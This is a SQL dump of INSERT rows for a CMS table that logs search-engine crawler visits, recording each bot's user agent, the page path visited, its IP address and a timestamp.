INSERT INTO `ey_weapp_spider_visit` VALUES ('96745', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/237.html', '162.55.86.60', '1661444339', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96746', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/238.html', '162.55.86.60', '1661444347', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96744', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/236.html', '162.55.86.60', '1661444332', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96561', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_3.html', '185.191.171.21', '1661362929', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96743', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/235.html', '162.55.86.60', '1661444324', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96740', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/buliaoji/', '162.55.86.60', '1661444300', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96741', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/233.html', '162.55.86.60', '1661444308', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96742', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/234.html', '162.55.86.60', '1661444314', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96563', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/news/451.html', '180.163.220.43', '1661363875', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96564', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_16.html', '185.191.171.35', '1661364106', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96566', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/17.html', '116.179.32.43', '1661364847', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96738', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_5/', '162.55.86.60', '1661444276', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96739', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_51/', '162.55.86.60', '1661444294', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97009', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/450.html', '185.191.171.15', '1661554231', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97054', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39.html', '185.191.171.37', '1661569412', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96567', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/318.html', '185.191.171.39', '1661365243', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96736', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_3/', '162.55.86.60', '1661444262', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96737', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_4/', '162.55.86.60', '1661444269', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96568', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/70.html', '185.191.171.12', '1661365462', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96735', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_2/', '162.55.86.60', '1661444252', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97008', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/5.html', '116.179.32.74', '1661554163', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96569', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_23/', '114.119.151.155', '1661366149', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96573', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_43/', '185.191.171.20', '1661368030', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96570', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/151.html', '114.119.151.153', '1661366482', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96571', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/172.html', '185.191.171.4', '1661366625', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96572', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/', '185.191.171.1', '1661367107', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96574', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/15.html', '116.179.32.115', '1661368122', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97007', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.183.224.82', '1661553951', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96575', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_41/', '114.119.151.155', '1661368732', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96576', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/144.html', '216.244.66.194', '1661368912', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96734', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/list_20_6/', '162.55.86.60', '1661444239', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96732', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/list_20_4/', '162.55.86.60', '1661444221', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96733', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/list_20_5/', '162.55.86.60', '1661444232', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96579', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/232.html', '66.249.79.108', '1661371433', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97003', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/358.html', '216.244.66.194', '1661552325', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96580', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_23/', '216.244.66.194', '1661371801', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96581', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/271.html', '185.191.171.6', '1661373020', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96588', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/19_2.html', '185.191.171.19', '1661376984', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96585', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/214.html', '66.249.79.110', '1661374797', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96583', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_67/', '66.249.79.110', '1661374079', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96584', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661374486', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96731', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/list_20_3/', '162.55.86.60', '1661444214', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96979', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/118.html', '185.191.171.12', '1661540294', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96586', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/305.html', '66.249.79.108', '1661376147', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96587', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_7', '114.119.151.155', '1661376320', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96590', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/132.html', '116.179.32.75', '1661377559', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96730', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/list_20_2/', '162.55.86.60', '1661444211', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96974', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/82.html', '114.119.151.155', '1661537320', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96975', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/85.html', '185.191.171.14', '1661537876', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96624', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '180.163.220.126', '1661393592', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96625', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '180.163.220.125', '1661393644', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96626', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.145', '1661394742', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96627', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tbxw/list_91_2/', '185.191.171.41', '1661395039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96628', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_16/', '220.181.108.92', '1661395777', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96629', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/191.html', '220.181.108.113', '1661395779', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96631', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_6.html', '185.191.171.42', '1661398681', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96630', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_10.html', '185.191.171.38', '1661395924', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96638', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/235.html', '114.119.151.155', '1661405275', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96636', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/183_2.html', '185.191.171.25', '1661403875', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96637', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '42.194.242.213', '1661404378', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96639', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.39', '1661405596', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96641', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1661405824', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96640', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/230.html', '114.119.151.153', '1661405600', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96644', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/339.html', '66.249.79.112', '1661406040', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96651', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/297.html', '114.119.151.153', '1661407913', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96645', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/hangyexinwen/list_18_9/', '114.119.151.155', '1661406129', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96646', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/486.html', '185.191.171.37', '1661406538', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96647', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/110.html', '114.119.151.153', '1661406736', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96648', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/80.html', '185.191.171.8', '1661407228', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96649', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xzs.html', '114.119.151.155', '1661407534', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96650', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/honor/25.html', '114.119.151.155', '1661407773', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96922', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661505958', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96664', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/262.html', '157.55.39.153', '1661415643', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96670', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1661419628', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96694', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661431564', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96665', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/index.php', '66.249.79.110', '1661416640', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96666', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_11/', '185.191.171.8', '1661417219', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96667', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_51/', '185.191.171.43', '1661417967', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96671', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1661420316', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96679', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/170.html', '116.179.32.40', '1661425232', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96690', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/115.html', '66.249.79.112', '1661428996', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96691', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_35/', '114.119.151.153', '1661429344', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96693', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/31_6.html', '116.179.32.170', '1661430142', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97307', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661668307', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96817', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/205.html', '114.119.151.153', '1661457300', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96820', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '103.43.70.250', '1661459248', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97265', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/212.html', '66.249.79.110', '1661654722', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97254', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/chezaibengal', '220.181.108.93', '1661651015', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97018', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.82', '1661557612', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97019', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/427.html', '114.119.151.153', '1661558095', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97020', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/423.html', '185.191.171.22', '1661558200', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97022', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/225.html', '185.191.171.23', '1661558513', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97049', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/332.html', '114.119.151.155', '1661568187', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97024', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/5.html', '116.179.32.212', '1661559072', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97025', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/435.html', '66.249.79.108', '1661559613', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97047', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.112', '1661567257', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97496', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tb', '116.179.32.108', '1661760847', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97032', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/457.html', '185.191.171.17', '1661561498', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97030', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.165', '1661561126', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97028', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/9_40.html', '66.249.79.110', '1661560505', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97034', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/jbJxw/', '17.121.115.12', '1661562146', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97503', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/439.html', '185.191.171.9', '1661763456', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97040', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/dxal.html', '114.119.151.155', '1661565278', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97041', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/471.html', '185.191.171.14', '1661565445', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97043', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/474.html', '114.119.151.155', '1661566255', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97044', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/306.html', '66.249.79.108', '1661566384', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97211', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/44_2.html', '116.179.32.38', '1661634978', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97518', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/cqs.html', '114.119.151.155', '1661772888', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97519', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.106', '1661773045', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97069', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/74.html', '185.191.171.19', '1661574433', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97071', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/list_2_4/', '66.249.79.112', '1661575301', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97521', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/499.html', '66.249.79.106', '1661773059', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97522', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39.html', '185.191.171.19', '1661773662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97074', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/401.html', '185.191.171.6', '1661576752', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97523', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/229.html', '185.191.171.18', '1661773732', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97202', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/150.html', '220.181.108.93', '1661629632', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97072', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661575788', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97075', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/192.html', '66.249.79.108', '1661577011', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97079', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/449.html', '66.249.79.108', '1661578252', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97531', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/13.html', '185.191.171.2', '1661777723', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97077', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/177.html', '66.249.79.108', '1661577421', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97537', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/7.html', '185.191.171.18', '1661778968', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97081', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/about/', '116.179.32.96', '1661578707', '0');
